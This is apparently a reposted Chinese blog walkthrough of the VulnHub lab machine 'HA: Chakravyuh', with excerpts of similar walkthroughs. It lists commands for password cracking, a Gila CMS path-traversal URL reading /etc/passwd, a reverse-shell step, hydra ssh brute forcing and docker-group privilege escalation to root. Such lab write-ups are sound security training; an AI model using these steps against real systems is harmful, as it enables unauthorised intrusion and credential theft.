HA: Chakravyuh Vulnhub Walkthrough

靶机链接：

https://www.vulnhub.com/entry/ha-chakravyuh,388/

主机探测扫描：

端口扫描：

╰─ nmap -p- -sC -sV 10.10.202.131

FTP 匿名访问

下载压缩文件，解压缩需要密码，基本套路一直，需要密码，接下来就是找解压密码的事情了

目录枚举下

phpmyadmin 尝试弱口令密码爆破未果

phpmyadmin 版本为4.6.6 无RCE之类的漏洞

那么尝试爆破下载的7z格式的压缩包文件

这里使用的工具：

https://github.com/truongkma/ctf-tools/blob/master/John/run/7z2john.py

python 7z2ctf.py arjun.7z > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john hash --show
arjun.7z:family

解压密码为：family

解码获取的secret.txt的内容为：

Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=

base64解码为：gila:[email protected]:princesa

gila为一个cms系统，尝试访问看看

登录后台：http://10.10.202.131/gila/admin

[email protected]:princesa

这里用到的exp https://www.exploit-db.com/exploits/47407

http://10.10.202.131/gila/admin/fm/?f=src../../../../../../../../../etc/passwd

浏览到系统目录文件，尝试编辑index.php 添加反shell代码进去，保存，访问即可弹回shell

python -c ‘import pty;pty.spawn("/bin/bash")‘

提权操作：

find / -perm -u=s -type f 2>/dev/null

find / -perm -g=s -type f 2>/dev/null

cat /etc/crontab

ls -lh /etc/passwd

netstat -tunlp

没找到可提权的程序，最后发现当前账户的属组是docker组的，大家都知道docker运行基本都是root权限的身份去执行的

docker run -v /root:/mnt -it alpine

此命令的意思是：docker运行一个交互式的Linux系统alpine，挂载系统的/root 目录到/mnt目录下，这样就可以获取到root目录下的文件内容了。或者直接写root的crontab 等

OVER!!

原文地址：https://www.cnblogs.com/hack404/p/12122893.html

时间： 2024-10-18 20:18:49

HA: Chakravyuh Vulnhub Walkthrough的相关文章

HA: Chanakya Vulnhub Walkthrough

靶机链接: https://www.vulnhub.com/entry/ha-chanakya,395/ 网络主机探测: 主机端口扫描: nmap -p- -sC -sV 10.10.202.136 FTP 有认证 HTTP目录枚举(dirb和dirsearch 多种工具使用枚举) dirb http://10.10.202.136 -X .php,.txt,.html,.xml,.yml,.json ---- Scanning URL: http://10.10.202.136/ ----+

HA: Dhanush Vulnhub Walkthrough

靶机下载链接: https://www.vulnhub.com/entry/ha-dhanush,396/ 主机扫描: 主机端口扫描: HTTP目录爬取使用dirb dirsearch 爬取均未发现可利用的目录另外看到ssh端口开启了,进行网页爬取字典生成进行爆破 cewl http://10.10.202.147 -w dict.txt ╰─ hydra -L dict.txt 10.10.202.147 ssh -s 65345 -e nsr 尝试复制passwd文件提示无权限,用户sa

Sunset: Nightfall Vulnhub Walkthrough

靶机链接: https://www.vulnhub.com/entry/sunset-nightfall,355/ 主机扫描: ╰─ nmap -p- -A 10.10.202.162Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-09 14:23 CSTNmap scan report for 10.10.202.162Host is up (0.0013s latency).Not shown: 65529 closed portsPOR

Happycorp:1 Vulnhub Walkthrough

靶机链接: https://www.vulnhub.com/entry/happycorp-1,296/ 网络主机扫描::: 主机端口扫描: NFS文件系统,尝试挂载试试 mount -t nfs 10.10.202.135:/home/karl /mnt 提示没权限打开.这里暂时放一放,看看HTTP方面,有个admin.php后台能不能上传,拿shell web页面收集用户信息: heather 提示密码错误carolyn 账户不存在rodney 账户不存在jennifer 账户不存在存在

Jerome: Vulnhub Walkthrough

nmap 扫描探测: ╰─ nmap -p1-65535 -sV -A -O -sT 10.10.202.135Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-31 10:15 CSTNmap scan report for 10.10.202.135Host is up (0.00091s latency).Not shown: 65534 closed portsPORT STATE SERVICE VERSION8080/tcp ope

Ted:1 Vulnhub Walkthrough

主机层面端口扫描: ╰─ nmap -p1-65535 -sV -A 10.10.202.134 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-09 11:11 CSTNmap scan report for 10.10.202.134Host is up (0.00075s latency).Not shown: 65534 closed portsPORT STATE SERVICE VERSION80/tcp open http Ap

digitalworld.local:Torment Vulnhub Walkthrough

主机层面扫描: ╰─ nmap -p1-65535 -sV -A 10.10.202.135Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-09 14:58 CSTNmap scan report for 10.10.202.135Host is up (0.0012s latency).Not shown: 65516 closed portsPORT STATE SERVICE VERSION21/tcp open ftp vsftpd

AI:WEB:1 Walkthrough

AI: Web: 1 Vulnhub Walkthrough靶机下载:https://www.vulnhub.com/entry/ai-web-1,353/测试方法: Nmap网络扫描浏览网页爆破目录 SQL注入获取凭证 SQL注入获取shell 可写/etc/passwd 提权读取falg文件靶机和攻击机处于统一网段下所以就不用netdiscover扫描了靶机IP:192.168.123.211攻击机IP:192.168.123.30 主机发

vulnhub~MyExpense

最近有点忙,这几天的vulnhub断更了,今天试着做了一下myexpense,当然想要一帆风顺是不可能的,哪怕是有别人的steps 和walkthrough.所以就遇到的坑总结如下: 一般套路就是nmap上手 dirsearch 发现/admin/admin.php ,访问后得到如下所示: 然后如别人所言,成功的利用xss(store),but file_put_contents()无法创建文件,这就尴尬啦.session 就无从获取了,最终发现是/var/www/html目录没有写的权限给其他